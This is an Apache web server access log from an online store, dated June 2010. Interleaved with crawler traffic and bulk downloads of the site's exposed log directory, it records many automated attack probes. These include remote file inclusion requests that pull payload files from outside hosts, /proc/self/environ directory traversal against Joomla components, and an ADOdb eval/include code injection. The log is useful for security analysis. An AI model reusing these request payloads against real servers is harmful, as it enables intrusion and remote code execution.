178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109103000 HTTP/1.1" 200 5432399 "http://www.aceonlinestore.com/logs/access_log.Q109103000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:28:14 -0400] "GET /logs/error_log.Q110010300%20%20//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109102900 HTTP/1.1" 200 6873404 "http://www.aceonlinestore.com/logs/access_log.Q109102900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
125.249.199.195 - - [21/Jun/2010:02:28:20 -0400] "GET //admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:28:20 -0400] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:28:21 -0400] "GET /logs/error_log.Q110010300%20%20//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:28:21 -0400] "GET /logs/access_log.Q110010300%20%20//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.195.114.223 - - [21/Jun/2010:02:28:46 -0400] "GET /scripts/prototype.js HTTP/1.0" 200 124136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.249.199.195 - - [21/Jun/2010:02:28:57 -0400] "GET /logs/access_log.Q110010300//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:28:58 -0400] "GET /logs/access_log.Q110010300//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:29:07 -0400] "GET /logs/error_log.Q110010300//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110400 HTTP/1.1" 200 5538748 "http://www.aceonlinestore.com/logs/access_log.Q109110400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109111100 HTTP/1.1" 200 5896585 "http://www.aceonlinestore.com/logs/access_log.Q109111100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110900 HTTP/1.1" 200 5400491 "http://www.aceonlinestore.com/logs/access_log.Q109110900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110800 HTTP/1.1" 200 3098198 "http://www.aceonlinestore.com/logs/access_log.Q109110800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110700 HTTP/1.1" 200 2632711 "http://www.aceonlinestore.com/logs/access_log.Q109110700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109111000 HTTP/1.1" 200 5013840 "http://www.aceonlinestore.com/logs/access_log.Q109111000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109111300 HTTP/1.1" 200 4946581 "http://www.aceonlinestore.com/logs/access_log.Q109111300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110600 HTTP/1.1" 200 3940907 "http://www.aceonlinestore.com/logs/access_log.Q109110600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109110500 HTTP/1.1" 200 6852448 "http://www.aceonlinestore.com/logs/access_log.Q109110500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:28:12 -0400] "GET /logs/access_log.Q109111200 HTTP/1.1" 200 5102390 "http://www.aceonlinestore.com/logs/access_log.Q109111200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:29:17 -0400] "GET /logs/error_log.Q110010300//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
163.20.26.5 - - [21/Jun/2010:02:29:22 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:29:30 -0400] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:29:31 -0400] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
67.195.114.223 - - [21/Jun/2010:02:23:41 -0400] "GET /logs/access_log.Q110042200 HTTP/1.0" 200 6408179 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
163.20.26.5 - - [21/Jun/2010:02:29:43 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:29:47 -0400] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:29:48 -0400] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
125.249.199.195 - - [21/Jun/2010:02:29:56 -0400] "GET /logs/access_log.Q110032600//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.206 - - [21/Jun/2010:02:30:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L11516E57007175001D2B093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109112100 HTTP/1.1" 200 1979338 "http://www.aceonlinestore.com/logs/access_log.Q109112100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111800 HTTP/1.1" 200 8619981 "http://www.aceonlinestore.com/logs/access_log.Q109111800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109112200 HTTP/1.1" 200 2187328 "http://www.aceonlinestore.com/logs/access_log.Q109112200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109112000 HTTP/1.1" 200 4313908 "http://www.aceonlinestore.com/logs/access_log.Q109112000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111700 HTTP/1.1" 200 6954149 "http://www.aceonlinestore.com/logs/access_log.Q109111700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109112300 HTTP/1.1" 200 5876924 "http://www.aceonlinestore.com/logs/access_log.Q109112300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111600 HTTP/1.1" 200 4492388 "http://www.aceonlinestore.com/logs/access_log.Q109111600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111400 HTTP/1.1" 200 2742027 "http://www.aceonlinestore.com/logs/access_log.Q109111400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111900 HTTP/1.1" 200 4234170 "http://www.aceonlinestore.com/logs/access_log.Q109111900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:29:13 -0400] "GET /logs/access_log.Q109111500 HTTP/1.1" 200 3171054 "http://www.aceonlinestore.com/logs/access_log.Q109111500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
125.249.199.195 - - [21/Jun/2010:02:30:22 -0400] "GET /logs/access_log.Q110042400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:02:30:22 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:30:12 -0400] "GET /logs/access_log.Q109112100 HTTP/1.1" 200 1979338 "http://www.aceonlinestore.com/logs/access_log.Q109112100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:30:32 -0400] "GET /logs/access_log.Q110032600//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.237.56.50 - - [21/Jun/2010:02:30:34 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mservice.com.vn/htmls/images/myid.jpg? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109120100 HTTP/1.1" 200 5619732 "http://www.aceonlinestore.com/logs/access_log.Q109120100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112500 HTTP/1.1" 200 3564565 "http://www.aceonlinestore.com/logs/access_log.Q109112500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109120200 HTTP/1.1" 200 5222116 "http://www.aceonlinestore.com/logs/access_log.Q109120200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109113000 HTTP/1.1" 200 4068743 "http://www.aceonlinestore.com/logs/access_log.Q109113000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112900 HTTP/1.1" 200 2295103 "http://www.aceonlinestore.com/logs/access_log.Q109112900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112400 HTTP/1.1" 200 5106376 "http://www.aceonlinestore.com/logs/access_log.Q109112400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109120300 HTTP/1.1" 200 5973546 "http://www.aceonlinestore.com/logs/access_log.Q109120300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112800 HTTP/1.1" 200 1597252 "http://www.aceonlinestore.com/logs/access_log.Q109112800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112600 HTTP/1.1" 200 1922305 "http://www.aceonlinestore.com/logs/access_log.Q109112600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:30:26 -0400] "GET /logs/access_log.Q109112700 HTTP/1.1" 200 2246310 "http://www.aceonlinestore.com/logs/access_log.Q109112700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
91.121.208.42 - - [21/Jun/2010:02:31:31 -0400] "GET /logs/access_log.Q110060700/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:31:31 -0400] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:31:31 -0400] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:31:40 -0400] "GET /logs/access_log.Q110060700/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:31:40 -0400] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:31:40 -0400] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.803"
125.249.199.195 - - [21/Jun/2010:02:31:43 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.20.26.5 - - [21/Jun/2010:02:32:18 -0400] "GET /logs/error_log.Q110050400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:32:19 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:32:20 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
202.125.152.246 - - [21/Jun/2010:02:32:29 -0400] "GET /logs/access_log.Q109111400//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.208.42 - - [21/Jun/2010:02:34:58 -0400] "GET /logs/access_log.Q110052900/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:02:35:50 -0400] "GET /logs/error_log.Q110060500/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
82.76.12.197 - - [21/Jun/2010:02:35:59 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:02:36:13 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
178.63.50.147 - - [21/Jun/2010:02:37:49 -0400] "HEAD / HTTP/1.1" 200 - "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:49 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:49 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:50 -0400] "GET / HTTP/1.1" 200 409 "http://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:50 -0400] "GET / HTTP/1.1" 200 409 "https://www.aceonlinestore.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
209.59.12.99 - - [21/Jun/2010:02:37:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:51 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:37:53 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.49.141 - - [21/Jun/2010:02:38:26 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.49.141 - - [21/Jun/2010:02:38:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4319)"
178.63.49.141 - - [21/Jun/2010:02:38:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4319)"
178.63.49.141 - - [21/Jun/2010:02:38:30 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.433)"
178.63.50.147 - - [21/Jun/2010:02:38:35 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:35 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:36 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:36 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /images/Office Supply/ HTTP/1.1" 404 211 "http://www.aceonlinestore.com/images/Office Supply/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300): HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300):" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
